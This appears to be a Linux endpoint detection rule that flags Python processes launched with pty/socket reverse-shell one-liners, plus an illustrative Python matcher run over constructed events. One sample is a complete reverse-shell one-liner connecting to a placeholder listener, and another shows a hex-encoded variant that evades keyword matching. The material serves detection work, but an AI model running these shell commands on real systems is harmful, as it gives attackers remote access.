
Summary
This detection rule monitors process-creation events on Linux for Python interpreters launched with a command line that uses the 'pty' and 'socket' modules to establish a reverse shell. It looks for invocations whose arguments contain the keywords typical of such one-liners: 'import', 'pty', 'socket', 'spawn' and '.connect'. Seen together on one command line, these keywords indicate a script that opens a network socket to a remote host and attaches an interactive shell to it, a common way for an attacker to obtain remote access after initial code execution. The rule relies on process creation telemetry (process name and arguments) rather than on network data, so it fires at the moment the interpreter starts. Because Python is widely used for legitimate administrative scripting on Linux, the rule keys on the combination of these keywords rather than on any single one, which keeps false positives low while still covering the common reverse-shell one-liners.
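The matching logic described above, run over a few constructed process-creation events, as an added example that is not part of the original rule or its published query. The keyword sets come from the description; treating 'import', 'pty' and 'socket' as all required and 'spawn' or '.connect' as either/or is this example's reading of it, and the `ProcessEvent` shape, `matches_rule` and `scan` names and the sample command lines are assumptions made here.

```python
import shlex
from dataclasses import dataclass
from typing import Iterable, List, Tuple

# Keywords taken from the rule description. Requiring all of the first three
# and at least one of the last two is this example's reading of that
# description, not the rule's published query.
REQUIRED_TOKENS = ("import", "pty", "socket")
ANY_OF_TOKENS = ("spawn", ".connect")


@dataclass(frozen=True)
class ProcessEvent:
    """Minimal process-creation event: executable name plus argv, as an
    EDR or auditd-style sensor would record it (hypothetical schema)."""
    name: str
    args: Tuple[str, ...]


def event_from_cmdline(name: str, cmdline: str) -> ProcessEvent:
    """Build an event from a shell-style command line (for sample input only)."""
    return ProcessEvent(name=name, args=tuple(shlex.split(cmdline)))


def is_python(name: str) -> bool:
    # Match python, python3, python3.11, whether bare or given by full path.
    return name.rsplit("/", 1)[-1].startswith("python")


def matches_rule(event: ProcessEvent) -> bool:
    """True when a Python interpreter starts with a command line carrying the
    reverse-shell keyword combination."""
    if not is_python(event.name):
        return False
    # Join argv so keywords split across arguments are still seen as one
    # command text. Matching is case-sensitive on purpose: module names are.
    cmdline = " ".join(event.args)
    return all(tok in cmdline for tok in REQUIRED_TOKENS) and any(
        tok in cmdline for tok in ANY_OF_TOKENS
    )


def scan(events: Iterable[ProcessEvent]) -> List[ProcessEvent]:
    """Return the events the rule would flag, in input order."""
    return [e for e in events if matches_rule(e)]


# Constructed sample command lines (not real telemetry). The first is the
# classic pty/socket reverse shell; 10.0.0.5:4444 is a made-up listener.
REVERSE_SHELL = (
    'import socket,os,pty;s=socket.socket();s.connect(("10.0.0.5",4444));'
    "[os.dup2(s.fileno(),f) for f in (0,1,2)];pty.spawn(\"/bin/sh\")"
)

SAMPLE_EVENTS = [
    # 1. Reverse shell one-liner: all keywords present, should fire.
    event_from_cmdline("/usr/bin/python3", "python3 -c '%s'" % REVERSE_SHELL),
    # 2. Routine admin script: no keywords on the command line, no match.
    event_from_cmdline("/usr/bin/python3",
                       "python3 /opt/scripts/rotate_logs.py --keep 14"),
    # 3. Connectivity check: import, socket and .connect but no pty, so the
    #    combination requirement keeps this out (false-positive control).
    event_from_cmdline(
        "/usr/bin/python3",
        "python3 -c 'import socket;s=socket.socket();"
        's.connect(("db.internal",5432));print("ok")\'',
    ),
    # 4. Same payload hex-encoded and exec'd: none of the keywords appear in
    #    argv, so plain keyword matching misses it. Useful as a coverage gap
    #    to document; pairing this rule with script-content or network
    #    telemetry is how that gap is usually closed.
    event_from_cmdline(
        "/usr/bin/python3",
        "python3 -c 'exec(bytes.fromhex(\"%s\"))'" % REVERSE_SHELL.encode().hex(),
    ),
]


if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print("MATCH" if matches_rule(ev) else "     ", " ".join(ev.args)[:70])
```

Only the first sample fires. Sample 3 shows why the rule needs the 'pty' keyword in addition to 'socket' and '.connect': a one-line TCP health check would otherwise trip it in any environment that scripts infrastructure in Python. Sample 4 shows the limit of command-line keyword matching, which is a property of every rule of this kind, not of this one in particular.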
Categories
- Linux
- Endpoint
Data Sources
- Process
- Command
Created: 2023-04-24